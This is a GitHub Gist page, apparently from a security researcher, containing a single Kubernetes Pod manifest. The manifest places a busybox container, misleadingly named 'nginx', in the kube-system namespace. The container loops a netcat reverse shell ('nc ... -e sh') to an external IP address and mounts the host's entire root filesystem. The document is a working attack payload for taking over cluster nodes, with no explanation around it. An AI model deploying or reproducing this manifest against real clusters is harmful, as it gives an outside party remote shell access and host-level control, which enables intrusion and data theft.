Last active
December 21, 2019 02:10
-
-
Save bgeesaman/4448326243cf344396b79fc53c426258 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apiVersion: v1 | |
kind: Pod | |
metadata: | |
name: bradgeesaman | |
namespace: kube-system | |
labels: | |
app: bradgeesaman | |
spec: | |
containers: | |
- image: docker.io/library/busybox:1.28.4 | |
name: nginx | |
command: | |
- sh | |
- -c | |
- while true; do nc 35.188.15.71 80 -e sh; done | |
volumeMounts: | |
- mountPath: /rootfs | |
name: host | |
volumes: | |
- name: host | |
hostPath: | |
path: / |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment